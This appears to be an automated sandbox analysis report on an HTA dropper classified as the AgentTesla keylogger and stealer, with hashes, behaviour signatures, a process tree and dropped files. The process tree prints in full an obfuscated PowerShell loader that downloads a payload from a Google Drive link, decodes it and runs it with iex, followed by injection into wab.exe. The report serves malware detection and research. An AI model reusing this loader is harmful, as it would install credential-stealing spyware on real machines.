Overview

overview

10

Static

static

1

2b50c5df81...b9.hta

windows7-x64

10

2b50c5df81...b9.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 09:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta

  • Size

    68KB

  • MD5

    7783fe86579a380bc61cdc4470dd0fc8

  • SHA1

    8dd0213228872a897f604a19ea0eda3dfb85ae20

  • SHA256

    2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9

  • SHA512

    0aa925c3b6fb73f806198dc331778e5628b874ac359de3a99f15cc53f2999426d01b0c6d55821c54b14ca6c9cac1f762db909e49395f5dc2ce8f3a53f55a8dea

  • SSDEEP

    192:giRpwijIw1govv2jEVUZDuEDMD+Y3Pet3pltqE6Nb6/0vOS2336SQ:dvS7ZvrS86S

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
        3⤵
          PID:2496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
            4⤵
              PID:1924
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2976

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        2666ade7567bc2271a7e376cb87dc0d4

        SHA1

        1aa6dfda24a4b3c0b5e46a978a9ff29073c0bebb

        SHA256

        d6460f541d692fd358b635bc9cf3c13270775338bd80504209b9d82c61a8970e

        SHA512

        be622e03b4d9988756e35a490e5180daead972b3a720e55ca87346b455de7223c49c27ed4cd06af7d3dfdf0dad4c399da761a26e2a627d1af8af281a3977af67

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Unfirmamented.Jab
        Filesize

        495KB

        MD5

        e6d8c108a21b9069c94e6ec0a9c97c09

        SHA1

        bd2c70ea4fe821e802d20b1e01bab00be8a36d71

        SHA256

        db4cef19f055629af73bd763b8dc82327c48cdc9f2aefff8c6505732ddb04800

        SHA512

        0f6fe8c176acfe4daeb7d7fee41c053e77601a90a48abcefac9ebfa7b3ca5238f77e936fd5e801d1e55781399d301c003d7cc7d27eb1647d54a5dfdd9729dd16

        Download Submit

      • memory/2688-15-0x00000000066C0000-0x00000000083B0000-memory.dmp

        Filesize

        28.9MB

        Download

      • memory/2976-38-0x00000000009A0000-0x0000000001A02000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2976-39-0x00000000009A0000-0x00000000009E2000-memory.dmp

        Filesize

        264KB

        Download